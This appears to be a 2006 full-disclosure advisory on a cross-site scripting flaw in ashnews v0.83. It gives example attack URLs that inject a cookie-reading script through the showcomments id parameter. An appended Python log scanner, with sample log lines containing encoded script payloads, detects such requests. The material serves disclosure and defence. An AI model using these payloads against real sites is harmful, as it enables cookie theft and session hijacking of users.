Securityvulns SECURITYVULNS:DOC:11232
Jan 30, 2006 - 12:00 a.m.

[Full-disclosure] ashnews Cross-Site Scripting Vulnerability


###########################################################################

Advisory #5 Title: ashnews Cross-Site Scripting Vulnerability

Author: 0o_zeus_o0 and fraude

Contact: [email protected]

Website: Elitemexico.org

Date: 30/01/2006

Risk: High

Vendor Url: http://dev.ashwebstudio.com/

Affected Software: ashnews

Non Affected:

We Are: olimpus klan team

#TECHNICAL INFO
#================================================================

#A vulnerability that allows theft of cookies and hijacking of the user's session

#Example:

#http://www.url.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script>

#http://www.url.com/[path]/ashnews.php?page=showcomments&id=[xss]

#Solution:

#VULNERABLE VERSIONS
#================================================================
#ashnews v0.83. Other versions may also be affected.

#================================================================
#Contact information
#0o_zeus_o0
#[email protected]
#www.olimpusklan.org
#================================================================
#greetz: lady fire,Mi beba, fraude and security-mx
##############################################################################
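For defenders running ashnews, the following added example (not part of the original advisory and not ashnews code) scans web server access logs for `ashnews.php?page=showcomments` requests whose `id` parameter is not a plain integer, including percent-encoded and double-encoded values. The log lines are constructed samples, and the rule that a legitimate comment `id` is a short run of digits is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(log_line):
    """Return the decoded id of a showcomments request if it is not an integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/ashnews.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if "showcomments" not in params.get("page", []):
        return None
    for raw in params.get("id", []):
        value = decode_fully(raw)
        # Assumption: a legitimate comment id is a short run of digits.
        if not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2006:10:00:01 +0000] "GET /news/ashnews.php?page=showcomments&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Jan/2006:10:00:07 +0000] "GET /news/ashnews.php?page=showcomments&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4980',
    '203.0.113.9 - - [30/Jan/2006:10:00:09 +0000] "GET /news/ashnews.php?page=showcomments&id=%253Cscript%253E HTTP/1.1" 200 4975',
    '203.0.113.7 - - [30/Jan/2006:10:01:00 +0000] "GET /news/index.php?id=%3Cb%3E HTTP/1.1" 200 900',
]

def scan(lines):
    """Return (line_number, decoded_id) for every flagged line."""
    found = ((n, suspicious_id(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in found if value is not None]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id {value!r}")
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) until the `id` value is validated and HTML-escaped in the application itself.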